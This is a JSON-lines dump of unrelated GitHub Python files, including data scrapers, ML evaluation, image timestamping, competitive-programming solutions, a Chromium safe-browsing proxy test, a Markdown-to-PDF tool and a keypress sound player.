cas_to_rm_list = remove_cas()\n\n crt_cand_cas_list = sp_vld_chk.rm_repeat(crt_cand_cas_list)\n\n after_filt = sp_vld_chk.can_be_removed_check(cas_to_rm_list, crt_cand_cas_list)\n\n crt_cand_cas_list = sp_vld_chk.rm_repeat(after_filt)\n\n if len(crt_cand_cas_list) == 0:\n\n print('Warning: No solvent candidate has been selected. Please add solvents.') # if the candidate has been emptied.\n\n print('Continue?')\n to_continue_ed_cas_opt = sp_vld_chk.finish_check()\n \n elif operation == 'v': # view current\n\n print('Current candidate list:')\n print(crt_cand_cas_list)\n\n print('Continue?')\n to_continue_ed_cas_opt = sp_vld_chk.finish_check()\n \n elif operation == 'q': # quit\n\n print('Confirm to quit SolvPred?')\n to_finish_ed_cand = sp_vld_chk.finish_check()\n\n if to_finish_ed_cand is True:\n\n exit()\n \n elif operation == 's': # submit\n\n print('Continue?')\n to_continue_ed_cas_opt = sp_vld_chk.finish_check()\n \n return crt_cand_cas_list\n\ndef edit_cand_list(current_cand_cas_list: list) -> list:\n \"\"\"return user updated candidate list\n\n Args:\n current_cand_cas_list (list): current candidate list\n\n Returns:\n list: user-updated candidated list\n \"\"\"\n\n to_continue_ed_cas_lst = True\n\n final_cand_list = sp_vld_chk.rm_repeat(current_cand_cas_list) # remove repeated cas entries from the candidate list\n\n while to_continue_ed_cas_lst:\n\n print('Submit?')\n submit_check = sp_io.continue_check() # submission check\n\n if submit_check == 1: # submit\n\n print('The following solvents will be considered as candidates: ')\n print(final_cand_list)\n\n to_continue_ed_cas_lst = False\n \n elif submit_check == 0:\n\n valid_how_to_edit_cand_list = ['a', 'rm', 'v', 's', 'q', 'add', 'remove', 'visualise', 'submit', 'quit'] # valid options to edit current candidate list\n\n how_to_edit_cand = sp_rtxt.rm_spc(str(input(\"Please select one of the following options: \\n[a] - add CAS \\n[rm] - remove CAS \\n[v] - visualise current candidate list\\n[s] - submit\\n[q] - quit\\n\" ))).lower() # ask users how do they want to modify the current candidate list\n\n if not sp_vld_chk.is_option_valid(valid_how_to_edit_cand_list, how_to_edit_cand):\n\n sp_vld_chk.invalid_input()\n edit_operation = 'n'\n \n elif how_to_edit_cand in ['a', 'add']:\n\n edit_operation = 'a'\n \n elif how_to_edit_cand in ['rm', 'remove']:\n\n edit_operation = 'rm'\n \n elif how_to_edit_cand in ['v', 'visualise']:\n\n edit_operation = 'v'\n \n elif how_to_edit_cand in ['s', 'submit']:\n\n edit_operation = 's'\n \n elif how_to_edit_cand in ['q', 'quit']:\n\n edit_operation = 'q'\n\n final_cand_list = edit_cand_cas_option(current_cand_cas_list, edit_operation)\n\n else:\n\n sp_vld_chk.invalid_input()\n \n return final_cand_list\n\n\n\n\n\n\n","repo_name":"xueannafang/hsp_toolkit_solv_pred_v_2.0","sub_path":"solv_pred_cand_edit.py","file_name":"solv_pred_cand_edit.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72429237605","text":"import tensorflow as tf\nslim = tf.contrib.slim\nfrom datasets import dataset_factory\nfrom nets import nets_factory\nfrom tensorflow.python.training.saver import latest_checkpoint\nfrom tensorflow.python.training.saver import Saver\nfrom tensorflow.python.training import supervisor\nfrom tensorflow import Session\nfrom tensorflow import ConfigProto\n\nimport time\nimport numpy as np\nimport scipy.io as sio\nimport cv2\n#train_dir = '/home/dmsl/nas/share/personal_lsh/training/cifar100/vanila/vgg13'\ntrain_dir = '/home/dmsl/Documents/tf/svd/teacher2'\ndataset_dir = '/home/dmsl/Documents/data/tf/cifar100'\ndataset_name = 'cifar10'\nmodel_name = 'vgg16'\nbatch_size = 200\ntf.logging.set_verbosity(tf.logging.INFO)\n\nwith tf.Graph().as_default():\n dataset = dataset_factory.get_dataset(dataset_name, 'test', dataset_dir)\n with tf.device('/device:CPU:0'):\n provider = slim.dataset_data_provider.DatasetDataProvider(dataset,\n shuffle=False,\n num_readers = 1,\n common_queue_capacity=200 * batch_size,\n common_queue_min=100 * batch_size)\n images, labels = provider.get(['image', 'label'])\n \n images = tf.to_float(images)\n images = tf.concat([(tf.slice(images,[0,0,0],[32,32,1])-112.4776)/70.4587,\n (tf.slice(images,[0,0,1],[32,32,1])-124.1058)/65.4312,\n (tf.slice(images,[0,0,2],[32,32,1])-129.3773)/68.2094],2)\n batch_images, batch_labels = tf.train.batch([images, labels],\n batch_size = batch_size,\n num_threads = 1,\n capacity = 200 * batch_size)\n \n batch_queue = slim.prefetch_queue.prefetch_queue([batch_images, batch_labels], capacity=50*batch_size)\n img, lb = batch_queue.dequeue()\n ## Load Model\n network_fn = nets_factory.get_network_fn(model_name)\n end_points = network_fn(img, is_training=False)\n print (end_points)\n task1 = tf.to_int32(tf.argmax(end_points['Logits'], 1))\n \n training_accuracy1 = slim.metrics.accuracy(task1, tf.to_int32(lb))\n \n variables_to_restore = slim.get_variables_to_restore()\n checkpoint_path = latest_checkpoint(train_dir)\n saver = Saver(variables_to_restore)\n config = ConfigProto()\n config.gpu_options.allow_growth=True\n sess = Session(config=config)\n sv = supervisor.Supervisor(logdir=checkpoint_path,\n summary_op=None,\n summary_writer=None,\n global_step=None,\n saver=None)\n correct = 0\n predict = 0\n with sv.managed_session(master='', start_standard_services=False, config=config) as sess:\n saver.restore(sess, checkpoint_path)\n optim_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n layer = {}\n name = ['conv1w','conv1b',\n 'conv2w','conv2b',\n 'conv3w','conv3b',\n 'conv4w','conv4b',\n 'conv5w','conv5b',\n 'conv6w','conv6b',\n 'conv7w','conv7b',\n 'conv8w','conv8b',\n 'conv9w','conv9b',\n 'conv10w','conv10b',\n 'fc1w','fc1b','fc2w','fc2b','fc3w','fc3b']\n for i in range(0,len(optim_vars)):\n p = sess.run(optim_vars[i])\n layer[name[i]] = p\n# \n t = time.time()\n predict = np.array([0,0], dtype = float)\n sv.start_queue_runners(sess)\n l = 0\n for i in range(50):\n p1, l1, task = sess.run([task1, lb, training_accuracy1])\n predict += task\n correct += np.sum(np.where(p1 == l1, 1,0))\n print (time.time()-t)\n \n accuracy = correct/(dataset.num_samples)\n print (accuracy)\n \n sess.close()\nsio.savemat('/home/dmsl/nas/backup1/personal_lsh/training/cifar100/vgg13_noaug.mat',layer)\n","repo_name":"InhaDeeplearningGroup/Academic_research","sub_path":"LSH/tensorflow_slim/eval_classifier.py","file_name":"eval_classifier.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"23902805977","text":"# https://www.amphioxus.org/content/timelapse-time-stamp-overlay\nimport json\nimport os\nfrom PIL import Image, ImageFont, ImageDraw, ExifTags\nfrom datetime import datetime\n\nfont = ImageFont.truetype(\"PlusJakartaText-Regular.ttf\", 72)\nfontsmall = ImageFont.truetype(\"PlusJakartaText-Regular.ttf\", 32)\nfontcolor = (238,161,6)\ncounter = 0\n# Go through each file in current directory\nfor i in os.listdir(os.getcwd()):\n\tif i.endswith(\".jpg\"):\n\t\tcounter += 1\n\t\tprint(\"Image {0}: {1}\".format(counter, i))\n \n \t# https://stackoverflow.com/a/62077871/4442148\n\t\timage_exif = Image.open(i)._getexif()\n\t\t# Make a map with tag names\n\t\texif = { ExifTags.TAGS[k]: v for k, v in image_exif.items() if k in ExifTags.TAGS and type(v) is not bytes }\n\t\t# Grab the date\n\t\tdate_obj = datetime.strptime(exif['DateTimeOriginal'], '%Y:%m:%d %H:%M:%S')\n\n\t\tget_exif_datex = date_obj.strftime('%Y:%m:%d')\n\t\tget_exif_timex = date_obj.strftime('%H:%M')\n\n\t\timg = Image.open(i)\n \n\t\t# get a drawing context\n\t\tdraw = ImageDraw.Draw(img)\n\t\tdraw.text((img.width-220,img.height-150), get_exif_datex, fontcolor, font=fontsmall)\n\t\tdraw.text((img.width-220,img.height-120), get_exif_timex, fontcolor, font=font)\n\t\tfilename = \"resized/\" + i[0:-4] + \"-resized.jpg\"\n\t\timg.save(filename)\n","repo_name":"raspberryrippl3/timestamp-images-using-exif-data","sub_path":"timestamp.py","file_name":"timestamp.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29087054769","text":"import numpy as np\nimport pandas as pd\nimport os\n\n# Call rate\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/fm02_m_1.html\"\nCall_Rate = pd.DataFrame(pd.io.html.read_html(url)[0])\nCall_Rate = Call_Rate.set_axis(['Date', 'Call_Rate_End_Month', 'Call_Rate_Ave_Month'], axis=1)\nCall_Rate.drop(Call_Rate.loc[0:6].index, inplace=True)\nCall_Rate = Call_Rate.replace({\"ND\": \"\"})\nCall_Rate[\"Date\"] = pd.DatetimeIndex(Call_Rate[\"Date\"])\nCall_Rate[\"Date\"] = Call_Rate['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Lending Interest\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/ir01_m_1.html\"\nLend_Int = pd.DataFrame(pd.io.html.read_html(url)[0])\nLend_Int.drop(Lend_Int.loc[0:6].index, inplace=True)\nLend_Int = Lend_Int.set_axis([\"Date\", \"Base_Lend_Rate\"], axis=1)\nLend_Int = Lend_Int.replace({\"ND\": \"\"})\nLend_Int[\"Date\"] = pd.DatetimeIndex(Lend_Int[\"Date\"])\nLend_Int[\"Date\"] = Lend_Int['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Monetary Base\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/md01_m_1.html\"\nMB = pd.DataFrame(pd.io.html.read_html(url)[0])\nMB.drop(MB.loc[0:6].index, inplace=True)\nMB = MB.set_axis([\"Date\", \"Growth_MB\", \"Growth_MB_BOJ_Notes_Issued\", \"Growth_MB_Currency_Circulation\",\n \"Growth_MB_BOJ_Current_Deposit\", \"MB\", \"MB_BOJ_Notes_Issued\", \"MB_Currency_Circulation\",\n \"MB_BOJ_Current_Deposit\"], axis=1)\nMB = MB.replace({\"ND\": \"\"})\nMB[\"Date\"] = pd.DatetimeIndex(MB[\"Date\"])\nMB[\"Date\"] = MB['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Fx rate\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/fm08_m_1.html\"\nFX_Rate = pd.DataFrame(pd.io.html.read_html(url)[0])\nFX_Rate.drop(FX_Rate.loc[0:6].index, inplace=True)\nFX_Rate = FX_Rate.set_axis(\n [\"Date\", \"FX_End_Month_17PM\", \"FX_Monthly_Average_17PM\", \"FX_End_Month_Central\", \"FX_Monthly_Average_Central\",\n \"FX_Month_Max\", \"FX_Month_Min\"], axis=1)\nFX_Rate = FX_Rate.replace({\"ND\": \"\"})\nFX_Rate[\"Date\"] = pd.DatetimeIndex(FX_Rate[\"Date\"])\nFX_Rate[\"Date\"] = FX_Rate['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n# Corporate CPI\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/pr01_m_1.html\"\nCorp_CPI = pd.DataFrame(pd.io.html.read_html(url)[0])\nCorp_CPI.drop(Corp_CPI.loc[0:6].index, inplace=True)\nCorp_CPI = Corp_CPI.set_axis([\"Date\", \"CGPI_Average_Annual_Growth\", \"Export_GPI_Average_Annual_Growth\",\n \"Import_CPI_Average_Annual_Growth\", \"Ignore_This\",\n \"CGPI_Average\", \"Ignore_This\",\n \"Export_CPI_Average\", \"Import_CPI_Average\", \"Ignore_This\"], axis=1)\nCorp_CPI = Corp_CPI.replace({\"ND\": \"\"})\nCorp_CPI[\"Date\"] = pd.DatetimeIndex(Corp_CPI[\"Date\"])\nCorp_CPI[\"Date\"] = Corp_CPI['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Deposits\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/md11_m_1.html\"\nDeposits = pd.DataFrame(pd.io.html.read_html(url)[0])\nDeposits.drop(Deposits.loc[0:6].index, inplace=True)\nDeposits = Deposits.set_axis([\"Date\", \"Total_Lending\", \"Lending_to_Corporate (Inc.Financial)\",\n \"Lending_to_Corporate_for_Facility_Investment\",\n \"Lending_to_Corporate_small_mid_Enterprises\",\n \"Lending_to_Individual\"], axis=1)\nDeposits = Deposits.replace({\"ND\": \"\"})\nDeposits[\"Date\"] = pd.DatetimeIndex(Deposits[\"Date\"])\nDeposits[\"Date\"] = Deposits['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Total Lending\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/md13_m_1.html\"\nLend_Total = pd.DataFrame(pd.io.html.read_html(url)[0])\nLend_Total.drop(Lend_Total.loc[0:6].index, inplace=True)\nLend_Total = Lend_Total.set_axis([\"Date\", \"Total_Lending_of_Banks_and_Shinkin_Bank\", \"Total_Lending_of_Banks\",\n \"Growth_of_Total_Lending_of_Banks\",\n \"Total_Lending_of_Metropolitan_Banks\",\n \"Total_Lending_of_All_Local_Banks\",\n \"Total_Lending_of_Large_Local_Banks\",\n \"Total_Lending_of_Small_Local_Banks\",\n \"Total_Lending_of_Shinkin_Banks\",\n \"Total_Lending_of_Foreign_Banks\",\n \"Total_Lending_of_Other_Banks\"], axis=1)\nLend_Total = Lend_Total.replace({\"ND\": \"\"})\nLend_Total[\"Date\"] = pd.DatetimeIndex(Lend_Total[\"Date\"])\nLend_Total[\"Date\"] = Lend_Total['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n# Current Account\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/bp01_m_1.html\"\nCurrent_Account = pd.DataFrame(pd.io.html.read_html(url)[0])\nCurrent_Account.drop(Current_Account.loc[0:6].index, inplace=True)\nCurrent_Account = Current_Account.set_axis([\"Date\", \"Current_Balance\", \"Financial_Balance\"], axis=1)\nCurrent_Account = Current_Account.replace({\"ND\": \"\"})\nCurrent_Account[\"Date\"] = pd.DatetimeIndex(Current_Account[\"Date\"])\nCurrent_Account[\"Date\"] = Current_Account['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Money Supply\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/md02_m_1.html\"\nMon_Sup = pd.DataFrame(pd.io.html.read_html(url)[0])\nMon_Sup.drop(Mon_Sup.loc[0:6].index, inplace=True)\nMon_Sup = Mon_Sup.set_axis([\"Date\", \"Growth_M2\", \"Growth_M3\", \"Growth_M1\",\n \"Liquidity_Growth\", \"Cash_Currency_Growth\", \"Deposit_Currency_Growth\",\n \"Quasi-Currency_Growth\", \"Ignore_This\", \"M2\", \"M3\", \"M1\", \"Liquidity\",\n \"Cash_Currency\", \"Deposit_Currency\", \"Quasi_Currency\", \"Ignore_This\"], axis=1)\nMon_Sup = Mon_Sup.replace({\"ND\": \"\"})\nMon_Sup[\"Date\"] = pd.DatetimeIndex(Mon_Sup[\"Date\"])\nMon_Sup[\"Date\"] = Mon_Sup['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Bond amount\nurl = \"https://www.stat-search.boj.or.jp/ssi/html/nme_R020MM.3818.20220131234952.01.html\"\nBonds = pd.DataFrame(pd.io.html.read_html(url)[0])\nBonds.drop(Bonds.loc[0].index, inplace=True)\nBonds = Bonds.set_axis([\"Date\", \"Total_Bond_Earned\", \"Total_Bond_Disposed\", \"Net_Bond_Amount\",\n \"Long-Medium_Run_Bond_Earned\", \"Long-Medium_Run_Bond_Disposed\", \"Net_Long-Medium_Run_Bond\",\n \"Short_Run_Bond_Earned\", \"Short_Run_Bond_Disposed\", \"Net_Short_Run_Bond\",\n \"BOJ_Asset_Bond\"], axis=1)\nBonds = Bonds.replace({\"ND\": \"\"})\nBonds[\"Date\"] = pd.DatetimeIndex(Bonds[\"Date\"])\nBonds[\"Date\"] = Bonds['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n# Data Frame\nData = pd.merge(Corp_CPI, Call_Rate, how=\"left\")\nData = pd.merge(Data, Current_Account, how=\"left\")\nData = pd.merge(Data, Deposits, how=\"left\")\nData = pd.merge(Data, FX_Rate, how=\"left\")\nData = pd.merge(Data, Lend_Int, how=\"left\")\nData = pd.merge(Data, Lend_Total, how=\"left\")\ndel Data[\"Ignore_This\"]\nData = pd.merge(Data, MB, how=\"left\")\nData = pd.merge(Data, Mon_Sup, how=\"left\")\ndel Data[\"Ignore_This\"]\nData = pd.merge(Data, Bonds, how=\"left\")\n\nos.chdir(\"/Volumes/TanigakiSSD/EconData/\")\nData.to_csv(\"Japanese_Economics.csv\")\n","repo_name":"MasashiTanigaki/OpenSourceEcon","sub_path":"Economics_Japan.py","file_name":"Economics_Japan.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35574003214","text":"import pandas as pd\nimport numpy as np\nimport transforms3d.euler as eul\nimport matplotlib.pyplot as plt\nimport os\n# be careful to make sure that the csv matches to the index\nos.chdir(r\"E:\\temp\\I\")\n\n# be careful to make sure that the csv matches to the index\nu = pd.read_csv(r'E:\\temp\\I\\stress.csv', header = 0, usecols = [3, 12,13,14,25])\nu.columns=[\"Part Instance\", \"x\", \"y\", \"z\",\"S33\" ]\n\nNoValue = \"ASSEMBLY\" ## remove the loading point\nindexNames = u[u[\"Part Instance\"]==NoValue].index\n\nu.drop(indexNames , inplace=True)\n\nu.drop(labels = \"Part Instance\", axis=1, inplace = True)\n\nu = u.astype(np.float64)\n\ndef plot_nodes(z,DF):\n df2 = DF.loc[DF[\"z\"]==z]\n\n df2['area'] = 1/df2['S33']\n \n area = np.sum(df2[\"area\"].values)\n return area\n\n\narea = plot_nodes(1.0,u)\n\n\n","repo_name":"wct24/wct24_shear_centre","sub_path":"old_code/I-beam/area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37591734380","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\n\r\ndef game(K):\r\n queue = deque([K])\r\n\r\n cnt = 0\r\n while queue:\r\n k = queue.popleft()\r\n if len(tree[k]) == 1 and k != 1:\r\n cnt += visited[k]\r\n else:\r\n for t in tree[k]:\r\n if visited[t] == -1:\r\n visited[t] = visited[k] + 1\r\n queue.append(t)\r\n\r\n return cnt\r\n\r\n\r\nN = int(input())\r\n\r\ntree = [[] for _ in range(N + 1)]\r\nfor _ in range(N - 1):\r\n a, b = map(int, input().split())\r\n tree[a].append(b)\r\n tree[b].append(a)\r\n\r\nvisited = [-1] * (N + 1)\r\nvisited[1] = 0\r\nresult = game(1)\r\n\r\nif result % 2:\r\n print('Yes')\r\nelse:\r\n print('No')","repo_name":"ict-cspark/Algorithm","sub_path":"백준/Silver/15900. 나무 탈출/나무 탈출.py","file_name":"나무 탈출.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12300994775","text":"import common\nfrom common import TestDriver\nfrom common import IntegrationTest\nfrom decorators import AndroidOnly\nfrom decorators import NotAndroid\n\nfrom selenium.common.exceptions import TimeoutException\n\nclass SafeBrowsing(IntegrationTest):\n\n @AndroidOnly\n def testSafeBrowsingOn(self):\n with TestDriver() as t:\n t.AddChromeArg('--enable-spdy-proxy-auth')\n\n # Starting in M63 LoadURL will timeout when the safebrowsing\n # interstitial appears.\n try:\n t.LoadURL('http://testsafebrowsing.appspot.com/s/malware.html')\n responses = t.GetHTTPResponses()\n self.assertEqual(0, len(responses))\n except TimeoutException:\n pass\n\n @NotAndroid\n def testSafeBrowsingOff(self):\n with TestDriver() as t:\n t.AddChromeArg('--enable-spdy-proxy-auth')\n t.LoadURL('http://testsafebrowsing.appspot.com/s/malware.html')\n responses = t.GetHTTPResponses()\n self.assertEqual(1, len(responses))\n for response in responses:\n self.assertHasChromeProxyViaHeader(response)\n\nif __name__ == '__main__':\n IntegrationTest.RunAllTests()\n","repo_name":"kiwibrowser/src","sub_path":"tools/chrome_proxy/webdriver/safebrowsing.py","file_name":"safebrowsing.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"22141159864","text":"from collections import namedtuple\nimport os\nimport re\n\npath = './process_directory/'\n\ndef main():\n files = []\n for r, d, f in os.walk(path):\n for file in f:\n if '.txt' in file:\n files.append(os.path.join(r, file))\n\n for f in files:\n # Processing Each file data put it in array\n company_data = []\n with open(f, \"r\") as f:\n # Reading a company text file line by line\n contents = f.readlines()\n header = contents[0].strip() # Extracting Headers of the file\n header = re.sub(r'\\s+', ', ', header) # Cleaning the data\n \n # Creating a lightweight object type for company info\n # where class properties like Date, CompanyName, Volume, Open, High etc. would be available\n Company = namedtuple('Company', header) \n for item in contents[1:]:\n item = re.sub(r'\\s+', ' ', item.strip()).split()\n # Storing each company object details to array\n c = Company(*item)\n company_data.append(c)\n # Here, We get the each company info in Object oriented fashion.\n # Now user either can store into DB or call 3rd party API\n # for this example I am printing the data\n print(company_data)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"birendra7654/NamedTuple","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13747496373","text":"#!/usr/bin/env python3\n\n# Command line flags\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Converts Markdown to elegant PDF reports')\nparser.add_argument('--basic', dest='basic', action='store_true',\n help='Do not enrich HTML with LaTeX and syntax highlighting (faster builds)')\nparser.add_argument('--watch', dest='watch', action='store_true',\n help='Watch the current folder for changes and rebuild automatically')\nparser.add_argument('--quiet', dest='quiet', action='store_true',\n help='Do not output any information')\nparser.add_argument(\"--timeout\", type=int, default=2,\n help='Page generation timeout')\nparser.set_defaults(watch=False)\nargs = parser.parse_args()\n\nfrom weasyprint import HTML\n\nfrom shutil import copyfile\nfrom distutils.dir_util import copy_tree\nfrom tempfile import gettempdir\nfrom time import time, sleep\nfrom sys import stdout, stderr\nimport subprocess\nimport re, glob, os\n\n# Check directory\n\nok = False\nfor file in os.listdir(\".\"):\n if file.endswith(\".md\"):\n ok = True\n break\nif not ok:\n stderr.write(\"No markdown file found in the current folder\")\n exit(1)\n\nscript_path = os.path.dirname(os.path.realpath(__file__))\n\n# Temp dir\n\ntimestamp = str(int(time()))\ntmp_dir = gettempdir() + \"/\" + timestamp + \"_md-report/\"\nos.makedirs(tmp_dir, exist_ok=True)\n\n# Headless browser\n\nif not args.basic:\n from selenium import webdriver\n from selenium.webdriver.firefox.options import Options\n from selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n options = Options()\n options.headless = True\n options.log.level = \"trace\"\n\n d = DesiredCapabilities.FIREFOX\n d['loggingPrefs'] = { 'browser':'ALL' }\n\n driver = webdriver.Firefox(options=options,capabilities=d)\n driver.set_page_load_timeout(args.timeout)\n\nprev_compile_time = 0\ndef recompile(notifier):\n if notifier is not None and (notifier.maskname != \"IN_MODIFY\" or notifier.pathname.endswith(\".pdf\")):\n return\n global prev_compile_time\n if time() - prev_compile_time < 1:\n return\n prev_compile_time = time()\n\n if not args.quiet:\n stdout.write(\"\\rBuilding the PDF file...\")\n stdout.flush()\n\n files = glob.glob(tmp_dir + '/*.md')\n for f in files:\n os.remove(f)\n\n copyfile(script_path + \"/base.html\", tmp_dir + \"/base.html\")\n if not os.path.islink(tmp_dir + \"/src\"):\n os.symlink(script_path + \"/src\", tmp_dir + \"/src\")\n copy_tree(\".\", tmp_dir)\n\n # Base HTML Template\n\n base_html = \"\"\n with open(tmp_dir + \"base.html\", \"r\") as base_html_file:\n base_html = base_html_file.read()\n\n # Markdown parsing\n\n subprocess.check_output(script_path + \"/md-parsing \" + tmp_dir, shell=True)\n html_file_name = tmp_dir + \"output.html\"\n\n # Interpret JS code\n\n if not args.basic:\n driver.get(\"file:///\" + html_file_name)\n sleep(2)\n elem = driver.find_element_by_xpath(\"//*\")\n interpreted_html = elem.get_attribute(\"outerHTML\")\n\n with open(html_file_name, \"w\") as html_out_file:\n html_out_file.write(interpreted_html)\n\n # Create final PDF file\n\n pdf = HTML(html_file_name).write_pdf()\n f = open(\"output.pdf\",'wb')\n f.write(pdf)\n\n if not args.quiet:\n stdout.write(\"\\rDone. \")\n stdout.flush()\n\nrecompile(None)\n\nif not args.watch:\n if not args.basic:\n driver.quit()\n exit(0)\n\nimport pyinotify\n\nwatch_manager = pyinotify.WatchManager()\nevent_notifier = pyinotify.Notifier(watch_manager, recompile)\n\nwatch_manager.add_watch(os.path.abspath(\".\"), pyinotify.ALL_EVENTS, rec=True)\nevent_notifier.loop()\n\nif not args.basic:\n driver.quit()\n","repo_name":"rginestou/MarkReport","sub_path":"MarkReport/MarkReport.py","file_name":"MarkReport.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"52"} +{"seq_id":"32089866710","text":"from pathlib import Path\n\n\ndef load_input(file_name):\n with open(file_name, \"r\") as file:\n return file.read().splitlines()\n\n\nfilename = f\"{Path(__file__).stem}.input\"\nprint(filename)\ninstructions = load_input(filename)\nprint(instructions)\n\naim = 0\nhorizontal = 0\ndepth = 0\n\nfor command in instructions:\n print(command)\n name = command.split(\" \")[0]\n value = command.split(\" \")[1]\n\n if name == \"down\":\n aim += int(value)\n elif name == \"up\":\n aim -= int(value)\n elif name == \"forward\":\n horizontal += int(value)\n depth += (aim * int(value))\n else:\n print(f\"unknown command found: {command}\")\n\nresult = horizontal * depth\nprint(f\"result : {result}\")","repo_name":"NikolaiAtanasoski/advent-of-code-2021","sub_path":"old/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37929464060","text":"n,k=map(int,input().split(\" \"))\nnOdd=0;nEven=0\nif n%2==0:\n nOdd=n//2\n nEven=n//2\nelse:\n nOdd=n//2+1\n nEven=nOdd-1\nans=0\nif k<=nOdd:\n ans=1+(k-1)*2\nelse:\n k-=nOdd\n ans=2+(k-1)*2\nprint(ans)\n","repo_name":"nautidpk/codeforce-problem-solving","sub_path":"evenOdds.py","file_name":"evenOdds.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35518925467","text":"from random import choice\nfrom pyxhook import HookManager\nfrom os.path import dirname, abspath\nimport signal, sys, time\nimport os\n\nsounds_dir = os.path.dirname(os.path.realpath(__file__))\nk_backspace = 'backspace.mp3'\nk_return = 'return.mp3'\nk_scrollDown = 'scrollDown.mp3'\nk_scrollUp = 'scrollUp.mp3'\nk_space = 'space.mp3'\nk_generic = ['key-01.mp3',\n 'key-02.mp3',\n 'key-03.mp3',\n 'key-04.mp3',\n 'key-05.mp3']\n\ndef play_sound(event):\n if event.Key == 'Return':\n sound = k_return\n elif event.Key == 'Up':\n sound = k_scrollUp\n elif event.Key == 'Down':\n sound = k_scrollDown\n elif event.Key == 'space':\n sound = k_space\n elif event.Key == 'BackSpace':\n sound = k_backspace\n elif event.Ascii:\n sound = choice(k_generic)\n else:\n sound = None\n\n if sound:\n os.system('mpg123 --quiet {0}/sounds/{1} &'.format(sounds_dir, sound))\n\ndef sigint_handler(signum, frame):\n print ('Received SIGINT', file=sys.stderr) # Say to the user what is going on\n hm.cancel() # Stop hm threads properly\n time.sleep(0.2) # Wait for threads to finish (usefull on small configs)\n sys.exit(0) # Free memory and exit\n\ndef main():\n signal.signal (signal.SIGINT, sigint_handler)\n #hm.HookKeyboard() # Dummy function in pyxhook\n #hm.HookMouse() # Dummy function in pyxhook\n #hm.KeyDown = play_sound\n hm.KeyUp = play_sound\n hm.start()\n\nif __name__ == '__main__':\n hm = HookManager() # Make hm global for sigint_handler to be able to access it\n main()\n hm.join() # Get __main__ thread to wait for hm to join\n","repo_name":"mikeholler/pyty","sub_path":"pyty.py","file_name":"pyty.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"12511148335","text":"# (c) 2005 Ben Bangert\n# This module is part of the Python Paste Project and is released under\n# the MIT License: http://www.opensource.org/licenses/mit-license.php\n\"\"\"\nOpenID Authentication (Consumer)\n\nOpenID is a distributed authentication system for single sign-on originally\ndeveloped at/for LiveJournal.com.\n\n http://openid.net/\n\nURL. You can have multiple identities in the same way you can have multiple\nURLs. All OpenID does is provide a way to prove that you own a URL (identity).\nAnd it does this without passing around your password, your email address, or\nanything you don't want it to. There's no profile exchange component at all:\nyour profiile is your identity URL, but recipients of your identity can then\nlearn more about you from any public, semantically interesting documents\nlinked thereunder (FOAF, RSS, Atom, vCARD, etc.).\n\n``Note``: paste.auth.openid requires installation of the Python-OpenID\nlibraries::\n\n http://www.openidenabled.com/\n\nThis module is based highly off the consumer.py that Python OpenID comes with.\n\nUsing the OpenID Middleware\n===========================\n\nUsing the OpenID middleware is fairly easy, the most minimal example using the\nbasic login form thats included::\n\n # Add to your wsgi app creation\n from paste.auth import open_id\n\n wsgi_app = open_id.middleware(wsgi_app, '/somewhere/to/store/openid/data')\n\nYou will now have the OpenID form available at /oid on your site. Logging in will\nverify that the login worked.\n\nA more complete login should involve having the OpenID middleware load your 